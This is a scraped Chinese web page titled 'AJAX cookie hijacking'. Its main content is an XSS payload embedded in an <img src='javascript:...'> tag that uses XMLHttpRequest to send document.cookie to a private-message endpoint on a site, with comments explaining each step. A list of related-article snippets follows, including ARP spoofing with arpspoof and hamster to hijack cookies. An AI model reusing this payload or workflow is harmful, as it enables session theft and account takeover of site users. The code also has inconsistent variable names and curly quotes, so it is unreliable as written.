AJAX 劫持cookie

一个简单的httprequest声明以及提交的过程

<img src="javascript.: 
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
  XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
  XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
  alert("Javascript must be enabled to continue.");
}
function socket()
{
//下面这行将非常重要.注意cookies是以参数的形式进行提交的

XMLHttpRequestObject.open(‘GET‘, ‘http://www.site.com/privatemessage.php?
user=yourusername&subject=‘ + window.document.cookie, true);
  XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  XMLHttpRequestObject.send(null);
//这句执行完,我们就可以放下心来了。
  delete XMLHttpRequestObject;
}
//不要忘记这是一张图片,所以我们必须关闭标签
window.document.onload=‘socket();‘">

时间: 2024-10-20 14:31:14

AJAX 劫持cookie的相关文章

ajax劫持?

<html<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8" /> <meta http-equiv="Cache-control" content="no-store" /> var bodyHtml = ""; var tcHtml = ""; va

『局域网安全』利用ARP欺骗劫持Cookie

0x 00 ARP欺骗说明 欺骗原理相关内容就不多叙述了,百度一大堆 实施ARP欺骗在Windows下,Linux下都相关工具 由于在Linux下可以开启ip_forward功能,个人认为Linux下的工具作用效果比较好 0x 01 攻击测试 1. 攻击拓扑 攻击机:Kali Linux    IP:192.168.1.109 受害机:Win 7 64位 IP:192.168.1.106 网关IP: 192.168.1.1 攻击工具:arpspoof,tcpdump,hamster,ferret

django框架下ajax获取cookie和session的方法以及简单的vue

Django的配置: pycharm中创建django工程之后注释掉MIDDLEWARE项中的'django.middleware.csrf.CsrfViewMiddleware'.此处作用是为了能够让js获取到cookie值 同时为了使用mysql,我们在setting中修改DATABASES中的'default'项为 'ENGINE': 'django.db.backends.mysql', 'NAME': 'db_test_shop1', 'HOST':'127.0.0.1', 'PORT

【计算机网络学习笔记】什么是cookie以及cookie劫持的基本概念

谨为今后学习参考的笔记.内容来自互联网. Cookie的基本概念: Cookie是由服务器端生成,发送给User-Agent(一般是浏览器),浏览器会将Cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该Cookie给服务器(前提是浏览器设置为启用cookie).Cookie名称和值可以由服务器端开发自己定义,对于JSP而言也可以直接写入jsessionid,这样服务器可以知道该用户是否合法用户以及是否需要重新登录等,服务器可以设置或读取Cookies中包含信

2020.02.05 Ajax请求的安全

Ajax请求的安全 AJAX请求真的不安全么 AJAX请求是否安全,由服务端(后台)决定 如果某个Web应用具备良好的安全性,那么再怎么用"不安全的AJAX"也削弱不了它的安全性,反之如果应用本身存在漏洞,不管用何种技术请求,它都是不安全的 为何会有这种说法?因为在Web应用中,客户端输入不可信是一个基本原则 常见的几种Web前端安全问题 要知道AJAX请求是否安全,那么就得先知道Web前端中到底有那几种安全问题 XSS(跨站脚本攻击)(cross-site scripting) 伪造

nodejs cookie与session

cookie.session cookie:在浏览器保存一些数据,每次请求都会带过来 *不安全.有限(4K) session:保存数据,保存在服务端 *安全.无限 -------------------------------------------------------------------------------------------------------------- session:基于cookie实现的 *cookie中会有一个session的ID,服务器利用sessionid

AJAX乱码解决新方法

用过AJAX的朋友肯定知道javascript是使用UTF-8国际编码,即每个汉字用3个字节来存储,但是这就造成了用AJAX来send数据的时候出现乱码.     有一种解决办法就是使用encodeURIComponent加上修改 Content-Type 为 application/x-www-form-urlencoded" 来把数据统一编码成 url 格式,但是这样做有一个弊端,使用php的urldecode根本不能得到正确的文字.     另一种方法就是通过vbscript 的写的函数把

HTML5安全风险详析之五:劫持攻击

本文我们要讲到一类的HTML5安全问题,也就是劫持的问题. 下面我们要讲到一类的HTML5安全问题,也就是劫持的问题. 一.ClickJacking-点击劫持 这种攻击方式正变得越来越普遍.被攻击的页面作为iframe,用Mask的方式设置为透明放在上层,恶意代码偷偷地放在后面的页面中,使得一个页面看起来似乎是安全的,然后诱骗用户点击网页上的内容,达到窃取用户信息或者劫持用户操作的目的.下图中,欺诈的页面放置在下层,被攻击的银行页面作为透明的层放置在上层,用户看到的是欺诈页面上显示的信息并进行输

js中cookie的使用 以及缺点

  什么是Cookie Cookie意为"甜饼",是由W3C组织提出,最早由Netscape社区发展的一种机制.目前Cookie已经成为标准,所有的主流浏览器如IE.Netscape.Firefox.Opera等都支持Cookie. 由于HTTP是一种无状态的协议,服务器单从网络连接上无从知道客户身份.怎么办呢?就给客户端们颁发一个通行证吧,每人一个,无论谁访问都必须携带自己通行证.这样服务器就能从通行证上确认客户身份了.这就是Cookie的工作原理. Cookie实际上是一小段的文本